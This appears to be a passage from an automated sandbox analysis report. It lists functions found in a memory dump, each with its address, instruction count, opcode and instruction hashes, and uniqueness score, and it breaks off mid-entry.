                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction ID: 48ba3f59a101bb6b5ea05ccb95f5c4640efd02fe9c08f8b06f0905b595dfb355
                            • Opcode Fuzzy Hash: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction Fuzzy Hash: D4F02B336180174BD318EE1DC89046073D1FB5532071003FAE487CB2E2DD58F9528680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401BD4 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction ID: 3a830baf4a329de3b0a774fd0b5fbd88bbba5a1a79a06c9b7d337c92355b03fd
                            • Opcode Fuzzy Hash: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction Fuzzy Hash: 97F0E535B1564B8BD325EE68C5848A6B3A3E7D4360B14C6BEC107CB7D8EE38F449D680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4001FC Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bdb9b18ecf675cce5e23b2c57475698f800d404a7746dde782ab6abed153809e
                            • Instruction ID: 0c0875e5452d914f53be7ae20e002d83c7aa420d060fcbce3bac839f1c46df89
                            • Opcode Fuzzy Hash: bdb9b18ecf675cce5e23b2c57475698f800d404a7746dde782ab6abed153809e
                            • Instruction Fuzzy Hash: A4F06D74E1010B8FDB44CF68C9845BEB7F1FB44305F108566E005E6240DA38AA108F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E408AA2 Relevance: .0, Instructions: 26COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 06a48fdc849f017c399dbf9d99a8c19933869dd7642f1a0f1494258f73ed0713
                            • Instruction ID: 053caec66b0fdd1e306918c523667cffd6d6608600899bb49947e9b1c9bfc0d1
                            • Opcode Fuzzy Hash: 06a48fdc849f017c399dbf9d99a8c19933869dd7642f1a0f1494258f73ed0713
                            • Instruction Fuzzy Hash: 1EE0E51692C9424BE654A66D455E435B7D2DF58350B5500FAE80EC7692FD1CEC414942
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4070F6 Relevance: .0, Instructions: 26COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a2307616bb255707b5cd67010cf37ac237bb2f0a07b9b87acc89e80512e0193d
                            • Instruction ID: 3a60cd9d2f157807e2929ba19d9465f5632cbe6e3252a9f240e4c0d0d8a26e3e
                            • Opcode Fuzzy Hash: a2307616bb255707b5cd67010cf37ac237bb2f0a07b9b87acc89e80512e0193d
                            • Instruction Fuzzy Hash: B2E09233A5C126478B2CED24495A4F967D79780B5031783BFD803DB2D4DC28DE0047C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40710D Relevance: .0, Instructions: 26COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 49fa71c92a196ebafb58fe901e8525641906bdf2d0b78289d7b06881a2cf8da0
                            • Instruction ID: a7837e71990cb53ccbb4c89ac118e2f8ff0794807264db352433ce6a16bd17a2
                            • Opcode Fuzzy Hash: 49fa71c92a196ebafb58fe901e8525641906bdf2d0b78289d7b06881a2cf8da0
                            • Instruction Fuzzy Hash: BEE06833A0C02247D72CBD28845A4F8A3DB9780710B0686BFD807EB2D0CC2CAD0147C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4026F3 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15bb6761f16c42ac76ae75002b22fb834ec3744d3b90e8c689517cc2cd0e87d7
                            • Instruction ID: 0d650e2c3859bc6c4fd79d07c001fdfba4bedac988ca15dc506bd9d4a0fc80a1
                            • Opcode Fuzzy Hash: 15bb6761f16c42ac76ae75002b22fb834ec3744d3b90e8c689517cc2cd0e87d7
                            • Instruction Fuzzy Hash: AEE0D83662C2024FC64CDE28C4A6475B3E2FBE6754764697EE083476C1CD24B4038A01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406D94 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13ed4d5f8f68849540048950040a3de6c4015af9f9726ff8d8de5758535c0161
                            • Instruction ID: 609b234e0a2b61f279806269a84fc238ceb66cb607ec6e91c39acd666c042ece
                            • Opcode Fuzzy Hash: 13ed4d5f8f68849540048950040a3de6c4015af9f9726ff8d8de5758535c0161
                            • Instruction Fuzzy Hash: A2E0D832744A194FD718DE54D4D41FCB2D2E798300B5041BF800BC73A2DF7898458784
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400F40 Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ad0e29c9e2e27d51c6d947df34372513b1d7852d5f812da0f229595c123e684
                            • Instruction ID: 687bdf61a3a49de62731d5de7cc01759a961a32560258fbda131a43782ea4dfe
                            • Opcode Fuzzy Hash: 6ad0e29c9e2e27d51c6d947df34372513b1d7852d5f812da0f229595c123e684
                            • Instruction Fuzzy Hash: ABE04F2563C60307E50CED5E858A57AB1C5DF95745F90B87EF28FC61C3CD4CB802548A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400FE4 Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 524403cdac2e5dc13c766d241fd5ee7f02cdf3e2529382422f628ab07dabeb9f
                            • Instruction ID: 93375093bc090a56590b004b5781db4874f52085281a91592af2a0f1cb43a84f
                            • Opcode Fuzzy Hash: 524403cdac2e5dc13c766d241fd5ee7f02cdf3e2529382422f628ab07dabeb9f
                            • Instruction Fuzzy Hash: 74D0A7677AC8060A704C110D3C932F8B3C1D7C227639001BBE58FC0A92EC0F640305C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400F81 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b33582eefdf7bc97d2d2ea3ced03515eb4d3f51bb83eba41c524bde5d42e8371
                            • Instruction ID: e313188a9046650614868f4cd7dc9be6b0cdb5c76113b470b0aa3794187062c7
                            • Opcode Fuzzy Hash: b33582eefdf7bc97d2d2ea3ced03515eb4d3f51bb83eba41c524bde5d42e8371
                            • Instruction Fuzzy Hash: D3E04F31A2EA054B824CEF189555139F6D0EB95B05F50597EF08FC6292CE28E9018A86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406D48 Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 680082046e6ec7bcff0a0e45b609868cd7fe8681b77d5b881622b3d66bd9a537
                            • Instruction ID: 9be4d0ad965cdc34a2197c676f042399d0014e7bf9c7207612762493aa93d72d
                            • Opcode Fuzzy Hash: 680082046e6ec7bcff0a0e45b609868cd7fe8681b77d5b881622b3d66bd9a537
                            • Instruction Fuzzy Hash: 14E0EC35B2C9198FDBA8EF28845177AA2D2EB48200F4181FEA04FD3692CE749C418B40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4005EC Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4837d79359f6d69a5e76aaf10b45ee3a03e4d413004b443923b1c8a1c74bc6b0
                            • Instruction ID: 0c5361aac177cf6b0f2eadfd8307232752b6e9e93058d0159a0478d125571196
                            • Opcode Fuzzy Hash: 4837d79359f6d69a5e76aaf10b45ee3a03e4d413004b443923b1c8a1c74bc6b0
                            • Instruction Fuzzy Hash: 50E04830B2978A87D64CAB68405603DB3D2FFC4705F40197EF047C71C2DF69A8014643
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402732 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction ID: 4db15a6ba56f69010e0d889ba2bf534927f51a10e5e0ab4e6dd5c08b7754d823
                            • Opcode Fuzzy Hash: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction Fuzzy Hash: FAE0483555870A8BD315AE16C084666F3E2EF41305F20457AE08F477D1CB38F906C745
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402124 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e6d391a8a8fbb237e0088efc2215888640fa58b6d328c4cf8d2060d1f9ca07b
                            • Instruction ID: 6e5e4d35419cb28dbe2690f84e23924b4b302b4cc9566afd6eaf43e5ffdb2c2a
                            • Opcode Fuzzy Hash: 0e6d391a8a8fbb237e0088efc2215888640fa58b6d328c4cf8d2060d1f9ca07b
                            • Instruction Fuzzy Hash: BFE020364096058BD750BD70C4889A5F3F1FF60309F1044B9F08B87251DE39F541C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40027A Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 933a9a3148f00aed3d434d850f3ac52c8cf778620899eb61732c00e67abd0061
                            • Instruction ID: 75fe673ed59fc63f1ac14ebb4871224ab420ff71b3a05eb2f21b05f31d5998fc
                            • Opcode Fuzzy Hash: 933a9a3148f00aed3d434d850f3ac52c8cf778620899eb61732c00e67abd0061
                            • Instruction Fuzzy Hash: C0E08C61A18A089FD786EF5880C0C9EBAE0EBA4744F00407BF08AC32A2DE31D4428712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406F24 Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8d8676253a45cd4125cf7ef46f0081fb7d0acc14a9861874c7a52557364182e
                            • Instruction ID: de94d75539bc747a3953d7d8cca5f3152deb8aa532c7b020bf0a7d6d90a89dfb
                            • Opcode Fuzzy Hash: f8d8676253a45cd4125cf7ef46f0081fb7d0acc14a9861874c7a52557364182e
                            • Instruction Fuzzy Hash: 4CD0C71576D4070AE184773550A637C71D6DFC9300F401576B50FC76C3DC1C6C424147
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E408AC9 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e9b715d21ddd94002ceba5e069274af98658759a8a60ceca4479419a179839bc
                            • Instruction ID: 7b09ed175ccfadcf488af6658c9b001f04fcf1e740572a6a9b95bc43dec8d065
                            • Opcode Fuzzy Hash: e9b715d21ddd94002ceba5e069274af98658759a8a60ceca4479419a179839bc
                            • Instruction Fuzzy Hash: 5ED0C920718C044FBB88F61C909D92973E2EF58301B004069B80EC72A2ED20EC818A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400F1F Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43a8594438153ce4bcb8b6378d83cf64e49d006d42791ed43d5d38135c8b695d
                            • Instruction ID: 8f550a317d2660dcc998fad9911e1192457d705d772df4d209aafad1566315b7
                            • Opcode Fuzzy Hash: 43a8594438153ce4bcb8b6378d83cf64e49d006d42791ed43d5d38135c8b695d
                            • Instruction Fuzzy Hash: B3C01227B596421AF250A458984B5E077C1E7552D17511576D526870A4FA545C471180
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E408BF1 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29f43b9d42ddf92f53e1bae308cf132356ac805335c825b5e6c1eeae982f0300
                            • Instruction ID: 04508256447d882ca4e303ec150662f4b001a74f195281460d893b1d24380bc9
                            • Opcode Fuzzy Hash: 29f43b9d42ddf92f53e1bae308cf132356ac805335c825b5e6c1eeae982f0300
                            • Instruction Fuzzy Hash: F8D0C934628A584FDB44AF2C940AA5877E1FB5C710B5101F8F809D7392ED34EC014785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40665D Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19a0243e98e1dffd51e73c139885ab9dfae0da4333c2f6d029e03eacaa1695dd
                            • Instruction ID: 4362e84c9c4dda16937f3dc6f5286cf9904725530423861c85b350a666e1ef14
                            • Opcode Fuzzy Hash: 19a0243e98e1dffd51e73c139885ab9dfae0da4333c2f6d029e03eacaa1695dd
                            • Instruction Fuzzy Hash: 42C0127BE3C61775B6281D2705D1438C9C64BD026083544FBF04F17984EC7C74016108
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402ABE Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction ID: c31c437e0e7b1a7ca8da8c15a589878e756ceb813880e6b533bf7d39e37b54ae
                            • Opcode Fuzzy Hash: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction Fuzzy Hash: ECD0A76A42D6C38BE315DE35C4C4735BB80AF0131CF2546FDE4974A4D3A62CE50AD609
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4050B1 Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74d963b915e518b9f72c3a935038fda2c245fb70b0129928fafbe9b1d44e4930
                            • Instruction ID: 3ad420c5e44d84a97cdbad5a70f12adff6b104a0c365e06beb7b116072341ade
                            • Opcode Fuzzy Hash: 74d963b915e518b9f72c3a935038fda2c245fb70b0129928fafbe9b1d44e4930
                            • Instruction Fuzzy Hash: F2C01298914B1E8E52546A69044412C73C0DB48544B90007E980AD3293DC586C234345
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401AB5 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 868c6a1a6cbc00f5ac3af783c4f5605841a367675c5b9d67e6a1c244bffc753e
                            • Instruction ID: fc19b294fc3dc28a3095255a22655ffaa0d1010b453d2009589f0b0d022dfa31
                            • Opcode Fuzzy Hash: 868c6a1a6cbc00f5ac3af783c4f5605841a367675c5b9d67e6a1c244bffc753e
                            • Instruction Fuzzy Hash: BED01202A1D1454AD6061A6954602AD58D64F89314F3802F7F04EC32D7EC2E59128106
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400823 Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 045bfa667da20894d4867da95e63abb43b8f16b809c9d77a990725864ea333a4
                            • Instruction ID: f94f8c97528438a017bca9212b46742616b1cb52f6ea8c95678f48a63631bf8a
                            • Opcode Fuzzy Hash: 045bfa667da20894d4867da95e63abb43b8f16b809c9d77a990725864ea333a4
                            • Instruction Fuzzy Hash: 9BC0123353924647911CDA14405282DF3D5B789A05F50593EF08782181DBA5A8024542
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4065FD Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e1478f23e8bc5a207199c73aa6ebc6b7312ccae82f42f92fe62c2016d8ab563
                            • Instruction ID: bc10183d225d30feac91c50737070bca7fe137dd2c8665b544a1abd7c2d01e7a
                            • Opcode Fuzzy Hash: 0e1478f23e8bc5a207199c73aa6ebc6b7312ccae82f42f92fe62c2016d8ab563
                            • Instruction Fuzzy Hash: 67D0121790C08753FA0C7E7651974BE99C21F82754F8248FFA0070BBC7DC1D70426215
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406AE9 Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d689d4d74fe2a0cf943d350f3b9aaaaaa4d9880b05ab4bc82427fb9d6753738b
                            • Instruction ID: a7f339b1419881057451ec713be7e60259423ce7aa282b8823fa3e5a050c57f6
                            • Opcode Fuzzy Hash: d689d4d74fe2a0cf943d350f3b9aaaaaa4d9880b05ab4bc82427fb9d6753738b
                            • Instruction Fuzzy Hash: DBC02B32C0730B46D7093130091204439908A06140B9500A3D40048092EC2E49C74242
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406B5C Relevance: .0, Instructions: 9COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc270c7412351a0cdea1a73a4689526d7d5140d028f461b9d11993c8f49a34cb
                            • Instruction ID: bd35cefdc6937ad17d9c32e3bb2a4c0a32f06eb43da408d079783ffc57979eaa
                            • Opcode Fuzzy Hash: fc270c7412351a0cdea1a73a4689526d7d5140d028f461b9d11993c8f49a34cb
                            • Instruction Fuzzy Hash: 56B0926BB24A2B3BA6D4B779029E27960D2AF9910479044B6A81FE3A97EC1C6C010250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406D06 Relevance: .0, Instructions: 9COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 66593f5a6abd289f95c66f385dc94b0f083d314c1cdf07abf7cbea2db27de395
                            • Instruction ID: f4384298b5b3fbfd9f7aad78b4ec7c8a6476db69abaff193c2fcf06397189b9b
                            • Opcode Fuzzy Hash: 66593f5a6abd289f95c66f385dc94b0f083d314c1cdf07abf7cbea2db27de395
                            • Instruction Fuzzy Hash: 2FB09B15B6441A07A654BBB54059378D0C6EBC8111B4504F5641FC75C3DD1CAC410351
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4061A0 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b21e58e7141dd4c7007b6df00b45932190a00dd0231f6716cfcd4cbca6dffee
                            • Instruction ID: e8983f92781e61a083ee831fb73b3f595b98e3cf4a3c0cf14edd90d59e761664
                            • Opcode Fuzzy Hash: 3b21e58e7141dd4c7007b6df00b45932190a00dd0231f6716cfcd4cbca6dffee
                            • Instruction Fuzzy Hash: 68B01230C4360B41DA183531194704831909B05104FC00575D40440141E86F51D74242
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404F09 Relevance: .0, Instructions: 6COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ba340c23a20c3cdffed3746b77d2a2fb3f1b31a75f52a5baf09d78746ccef11
                            • Instruction ID: d8f9cac43927b757bcf2683e56067a0631b312e12a737266c0fa22b486cb67d0
                            • Opcode Fuzzy Hash: 1ba340c23a20c3cdffed3746b77d2a2fb3f1b31a75f52a5baf09d78746ccef11
                            • Instruction Fuzzy Hash: ECA0110023CA0A2BA0C8B2EA008C220A8C38B88200B8880B2288EC2382FC2888000222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406629 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6740b67d8ea3cce57e266a89eefae367b278712da7b405b05f3d166c9277181
                            • Instruction ID: 5988b09caf6bad00d043770f52ca728fb6e4ade6b8918da1e36131121d8c6556
